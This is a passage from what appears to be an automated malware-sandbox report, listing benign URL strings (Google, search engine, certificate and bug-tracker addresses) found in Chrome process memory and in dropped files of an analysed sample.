    Source: chrome.exe, 00000010.00000003.2660325626.000078C400F9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2660907593.000078C400A5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2660364108.000078C401070000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2661059265.000078C400FC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2660872042.000078C400CF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2659915954.000078C401044000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2661381988.000078C4010EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2661266172.000078C40040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2660023682.000078C401054000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2660952834.000078C40089C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2660054702.000078C4010A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2661523381.000078C40120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2726245075.000078C4002F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/LICENSE.txt
    Source: chrome.exe, 00000010.00000003.2660325626.000078C400F9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2660907593.000078C400A5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2660364108.000078C401070000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2661059265.000078C400FC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2660872042.000078C400CF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2659915954.000078C401044000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2661381988.000078C4010EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2661266172.000078C40040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2660023682.000078C401054000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2660952834.000078C40089C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2660054702.000078C4010A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2661523381.000078C40120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2726245075.000078C4002F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/PATENTS.txt
    Source: chrome.exe, 00000010.00000002.2729365685.000078C4009B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2725224995.000078C4000F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2732599475.000078C400E40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://redirector.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNzI0QUFXNV9zT2RvdUw
    Source: chrome.exe, 00000010.00000002.2729409445.000078C4009DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://safebrowsing.googleusercontent.com/safebrowsing/clientreport/chrome-certs
    Source: Suicide.com.1.dr, Speak.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
    Source: Suicide.com.1.dr, Speak.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
    Source: chrome.exe, 00000010.00000002.2729999238.000078C400A2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://unisolated.invalid/
    Source: chrome.exe, 00000010.00000002.2729999238.000078C400A2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://unisolated.invalid/a
    Source: Suicide.com, 0000000A.00000000.1702752376.00000000002F9000.00000002.00000001.01000000.00000007.sdmp, Suicide.com.1.dr, Curtis.0.drString found in binary or memory: http://www.autoitscript.com/autoit3/J
    Source: Yn13dTQdcW.exeString found in binary or memory: http://www.digicert.com/CPS0
    Source: chrome.exe, 00000010.00000002.2730111087.000078C400A68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.gstatic.com/generate_204
    Source: chrome.exe, 00000010.00000002.2730999362.000078C400C34000.00000004.00000800.00020000.00000000.sdmp, KFUAIW.10.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
    Source: chrome.exe, 00000010.00000002.2725847154.000078C40020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accountcapabilities-pa.googleapis.com/
    Source: chrome.exe, 00000010.00000002.2724958067.000078C40009C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accountcapabilities-pa.googleapis.com/v1/accountcapabilities:batchGet
    Source: chrome.exe, 00000010.00000002.2728611172.000078C400824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2731250474.000078C400CB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2726754686.000078C400464000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com
    Source: chrome.exe, 00000010.00000002.2731306875.000078C400CD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2724689572.000078C40000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/
    Source: chrome.exe, 00000010.00000002.2725770050.000078C4001D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/AddSession
    Source: chrome.exe, 00000010.00000002.2725847154.000078C40020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/GetCheckConnectionInfo
    Source: chrome.exe, 00000010.00000002.2725847154.000078C40020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ListAccounts?json=standard
    Source: chrome.exe, 00000010.00000002.2725770050.000078C4001D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/Logout
    Source: chrome.exe, 00000010.00000002.2725770050.000078C4001D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/Logout1
    Source: chrome.exe, 00000010.00000002.2725770050.000078C4001D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/MergeSession
    Source: chrome.exe, 00000010.00000002.2725770050.000078C4001D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/OAuthLogin
    Source: chrome.exe, 00000010.00000002.2725847154.000078C40020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/RotateBoundCookies
    Source: chrome.exe, 00000010.00000002.2725847154.000078C40020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/chrome/blank.html
    Source: chrome.exe, 00000010.00000002.2725847154.000078C40020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/chrome/blank.htmlB
    Source: chrome.exe, 00000010.00000002.2725847154.000078C40020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/reauth/chromeos
    Source: chrome.exe, 00000010.00000002.2724892122.000078C400074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/chrome/usermenu
    Source: chrome.exe, 00000010.00000002.2724892122.000078C400074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/kidsignin/chromeos
    Source: chrome.exe, 00000010.00000002.2724892122.000078C400074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/kidsignup/chromeos
    Source: chrome.exe, 00000010.00000002.2725847154.000078C40020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/v2/chromeos
    Source: chrome.exe, 00000010.00000002.2725847154.000078C40020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/windows
    Source: chrome.exe, 00000010.00000002.2725847154.000078C40020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/xreauth/chrome
    Source: chrome.exe, 00000010.00000002.2725847154.000078C40020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/encryption/unlock/desktop
    Source: chrome.exe, 00000010.00000002.2724958067.000078C40009C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/encryption/unlock/desktop?kdi=CAIaDgoKY2hyb21lc3luYxAB
    Source: chrome.exe, 00000010.00000002.2725847154.000078C40020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/o/oauth2/revoke
    Source: chrome.exe, 00000010.00000003.2661229181.000078C400C58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2656474444.000078C400C5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2725847154.000078C40020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/oauth/multilogin
    Source: chrome.exe, 00000010.00000002.2725847154.000078C40020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/signin/chrome/sync?ssp=1
    Source: chrome.exe, 00000010.00000002.2731306875.000078C400CD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/x
    Source: chrome.exe, 00000010.00000002.2725847154.000078C40020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com:443
    Source: chrome.exe, 00000010.00000003.2686970809.000078C40140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aida.googleapis.com/v1/aida:doConversation2
    Source: chrome.exe, 00000010.00000002.2730999362.000078C400C34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653702295.000078C40089C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2650227930.000078C400388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653673202.000078C400388000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4830
    Source: chrome.exe, 00000010.00000002.2730999362.000078C400C34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653702295.000078C40089C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2650227930.000078C400388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653673202.000078C400388000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4966
    Source: chrome.exe, 00000010.00000002.2730999362.000078C400C34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653702295.000078C40089C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2650227930.000078C400388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653673202.000078C400388000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/5845
    Source: chrome.exe, 00000010.00000002.2730999362.000078C400C34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653702295.000078C40089C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2650227930.000078C400388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653673202.000078C400388000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/6574
    Source: chrome.exe, 00000010.00000002.2730999362.000078C400C34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653702295.000078C40089C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2650227930.000078C400388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653673202.000078C400388000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7161
    Source: chrome.exe, 00000010.00000002.2730999362.000078C400C34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653702295.000078C40089C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2650227930.000078C400388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653673202.000078C400388000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7162
    Source: chrome.exe, 00000010.00000002.2730999362.000078C400C34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653702295.000078C40089C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2650227930.000078C400388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653673202.000078C400388000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7246
    Source: chrome.exe, 00000010.00000002.2730999362.000078C400C34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653702295.000078C40089C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2650227930.000078C400388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653673202.000078C400388000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7308
    Source: chrome.exe, 00000010.00000002.2730999362.000078C400C34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653702295.000078C40089C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2650227930.000078C400388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653673202.000078C400388000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7319
    Source: chrome.exe, 00000010.00000002.2730999362.000078C400C34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653702295.000078C40089C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2650227930.000078C400388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653673202.000078C400388000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7320
    Source: chrome.exe, 00000010.00000002.2730999362.000078C400C34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653702295.000078C40089C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2650227930.000078C400388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653673202.000078C400388000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7369
    Source: chrome.exe, 00000010.00000002.2730999362.000078C400C34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653702295.000078C40089C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2650227930.000078C400388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653673202.000078C400388000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7382
    Source: chrome.exe, 00000010.00000002.2730999362.000078C400C34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653702295.000078C40089C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2650227930.000078C400388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653673202.000078C400388000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7489
    Source: chrome.exe, 00000010.00000002.2730999362.000078C400C34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653702295.000078C40089C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2650227930.000078C400388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653673202.000078C400388000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7604
    Source: chrome.exe, 00000010.00000002.2730999362.000078C400C34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653702295.000078C40089C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2650227930.000078C400388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653673202.000078C400388000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7714
    Source: chrome.exe, 00000010.00000002.2730999362.000078C400C34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653702295.000078C40089C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2650227930.000078C400388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653673202.000078C400388000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7847
    Source: chrome.exe, 00000010.00000002.2730999362.000078C400C34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653702295.000078C40089C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2650227930.000078C400388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653673202.000078C400388000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7899
    Source: chrome.exe, 00000010.00000002.2744123721.000078C401CA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2696757712.000078C401344000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2693773778.000078C401CE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
    Source: 9R1D2D.10.drString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
    Source: 9R1D2D.10.drString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
    Source: chrome.exe, 00000010.00000002.2728286701.000078C4007B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2726971757.000078C400528000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2733079553.000078C400EF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://calendar.google.com/calendar/u/0/r/eventedit?usp=chrome_actions
    Source: chrome.exe, 00000010.00000002.2730999362.000078C400C34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.ico
    Source: chrome.exe, 00000010.00000002.2730999362.000078C400C34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.ico800106
    Source: KFUAIW.10.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
    Source: chrome.exe, 00000010.00000003.2696966884.000078C400C5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2661229181.000078C400C58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2731046404.000078C400C54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2656474444.000078C400C5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2685858348.000078C400C58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.ico
    Source: chrome.exe, 00000010.00000003.2696966884.000078C400C5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2661229181.000078C400C58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2731046404.000078C400C54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2656474444.000078C400C5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2685858348.000078C400C58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icofrom_play_api
    Source: KFUAIW.10.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
    Source: chrome.exe, 00000010.00000003.2696966884.000078C400C5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2661229181.000078C400C58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2731046404.000078C400C54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2656474444.000078C400C5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2685858348.000078C400C58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/search
    Source: chrome.exe, 00000010.00000003.2696966884.000078C400C5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2661229181.000078C400C58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2731046404.000078C400C54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2656474444.000078C400C5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2685858348.000078C400C58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=
    Source: chrome.exe, 00000010.00000003.2696966884.000078C400C5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2661229181.000078C400C58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2731046404.000078C400C54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2656474444.000078C400C5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2685858348.000078C400C58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=searchTerms
    Source: chrome.exe, 00000010.00000002.2729409445.000078C4009DC000.00000004.00000800.00020000.00000000.sdmp, KFUAIW.10.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
    Source: chrome.exe, 00000010.00000003.2656940206.000078C400F40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore
    Source: chrome.exe, 00000010.00000002.2727726590.000078C4006CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore206E5
    Source: chrome.exe, 00000010.00000002.2733944167.000078C40116C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2731046404.000078C400C54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2730111087.000078C400A68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2729409445.000078C4009DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2728659384.000078C400844000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
    Source: chrome.exe, 00000010.00000002.2733944167.000078C40116C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en3
    Source: chrome.exe, 00000010.00000003.2663369383.000078C400F40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2661471400.000078C400344000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2657880853.000078C400F40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2654363786.000078C400D08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2656940206.000078C400F40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoreLDDiscover
    Source: chrome.exe, 00000010.00000002.2723724683.000037680079C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/
    Source: chrome.exe, 00000010.00000003.2637886202.00003768003AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2686970809.000078C40140C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2637677996.00003768003A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
    Source: chrome.exe, 00000010.00000002.2723724683.000037680079C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/
    Source: chrome.exe, 00000010.00000003.2637886202.00003768003AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2686970809.000078C40140C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2637677996.00003768003A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
    Source: chrome.exe, 00000010.00000002.2723724683.000037680079C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/KAnonymityServiceJoinRelayServerhttps://chromekanonym
    Source: chrome.exe, 00000010.00000002.2723724683.000037680079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2690086393.000078C4015AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2690031645.000078C4015A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
    Source: chrome.exe, 00000010.00000003.2637886202.00003768003AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2686970809.000078C40140C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2637677996.00003768003A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
    Source: chrome.exe, 00000010.00000002.2725847154.000078C40020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromereporting-pa.googleapis.com/v1/events
    Source: chrome.exe, 00000010.00000002.2725847154.000078C40020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromereporting-pa.googleapis.com/v1/record
    Source: chrome.exe, 00000010.00000002.2724689572.000078C40000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromewebstore.google.com/
    Source: chrome.exe, 00000010.00000002.2731169229.000078C400CA3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromium-i18n.appspot.com/ssl-aggregate-address/
    Source: chrome.exe, 00000010.00000002.2725770050.000078C4001D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://classroom.googleapis.com/
    Source: chrome.exe, 00000010.00000002.2725770050.000078C4001D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://classroom.googleapis.com/g1
    Source: chrome.exe, 00000010.00000003.2634156715.00002A8C002EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2634134070.00002A8C002E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/cr/report
    Source: chrome.exe, 00000010.00000002.2731046404.000078C400C54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2727662332.000078C40069C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2641552249.000078C4004CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2724689572.000078C40000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2727760443.000078C4006E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2727726590.000078C4006CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx
    Source: chrome.exe, 00000010.00000002.2727662332.000078C40069C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxx
    Source: chrome.exe, 00000010.00000002.2729409445.000078C4009DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collection-images?rt=b
    Source: chrome.exe, 00000010.00000002.2729409445.000078C4009DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collections?rt=b
    Source: chrome.exe, 00000010.00000002.2728286701.000078C4007B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=b
    Source: chrome.exe, 00000010.00000002.2725770050.000078C4001D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients4.google.com/chrome-sync
    Source: chrome.exe, 00000010.00000002.2725770050.000078C4001D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients4.google.com/chrome-sync/event
    Source: chrome.exe, 00000010.00000002.2727662332.000078C40069C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2656474444.000078C400C5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
    Source: 9R1D2D.10.drString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
    Source: 9R1D2D.10.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
    Source: chrome.exe, 00000010.00000002.2725619000.000078C4001B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/clientupdate-aus/1
    Source: chrome.exe, 00000010.00000002.2730303289.000078C400AE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/gws/none
